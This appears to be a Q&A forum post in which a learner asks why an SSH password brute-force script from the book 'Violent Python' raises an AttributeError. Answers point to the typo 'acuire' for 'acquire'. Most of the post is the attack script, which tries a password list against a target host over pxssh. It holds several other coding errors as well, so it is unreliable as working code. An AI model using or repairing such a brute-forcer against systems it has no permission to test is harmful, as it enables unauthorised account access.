# AttributeError: '_BoundedSemaphore' object has no attribute 'acuire'

Tags: python

I am learning python, and learning through a book called Violent Python, I am on a section which involves making a brute force SSH script. I am having problems with an error, and cannot figure out the problem or the fix.

the code:

```
import pxssh
import optparse
import time
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0

def connect(host, user, password, release):
global Found
global Fails

try:
    s= pxssh.pxssh()
    s.login(host, user, password)
    print '[+] Password Found: ' + password
    Found = True

except Exception, e:
    if 'read_nonblocking' in str(e):
        Fails += 1
        time.sleep(5)
        connect(host, user, password, False)

    elif 'synchronize with original prompt' in str(e):
          time.sleep(1)
          connect(host, user, password, False)

finally:
  if release: connection_lock.release()
def main():

  parser = optparse.OptionParser('usage%prog ' + \
'-H <target host> -u <user> -F <password list>')

  parser.add_option('-H', dest='tgtHost', type='string', \
help='target host')

  parser.add_option('-F', dest='passwdFile', type='string', \
help='specify password file')

  parser.add_option('-u', dest='user', type='string', \
help='the user')

  (options, args) = parser.parse_args()
  host = options.tgtHost
  passwdFile = options.passwdFile
  user = options.user

  if host == None or passwdFile == None or user == None:
    print parser.usage
    exit(0)
  fn = open(passwdFile, 'r')
  for line in fn.readlines():
    if Found:
    print "[*] Exiting: Password Found"
    exit(0)
    if Fails > 5:
      print "[!] Exiting: Too Many Socket Timeouts"
      exit(0)

  connection_lock.acuire()
  password = line.strip('\r').strip('\n')
  print "[-] Testing: "+str(password)
  t = Tread(target=connect, args=(host, user, password, true))
  child = t.start()
if __name__ == '__main__':
main()
```

this is the error I get:

```
    [root@test ~]# python2.7 test5.py -H x.x.x.x -u root -F pass.txt
    Traceback (most recent call last):
      File "test5.py", line 70, in <module>
        main()
      File "test5.py", line 64, in main
        connection_lock.acuire()
    AttributeError: '_BoundedSemaphore' object has no attribute 'acuire'
```

I have edited out the actual host x.x.x.x but the host I am using is up and live.
any help understanding this error and a fix would be helpful.

Comment: Did you mean "acquire"?

Answer (score 1):

You simply have a typo; the line should be

```
connection_lock.acquire()
#                 ^
```

Answer (score 1):

As the error states, `AttributeError: '_BoundedSemaphore' object has no attribute 'acuire'` you're trying to use the method *acuire* which doesn't exist in the object *_BoundedSemaphore*.

My guess is that you're writing it incorrectly and it should be most probably *acquire*.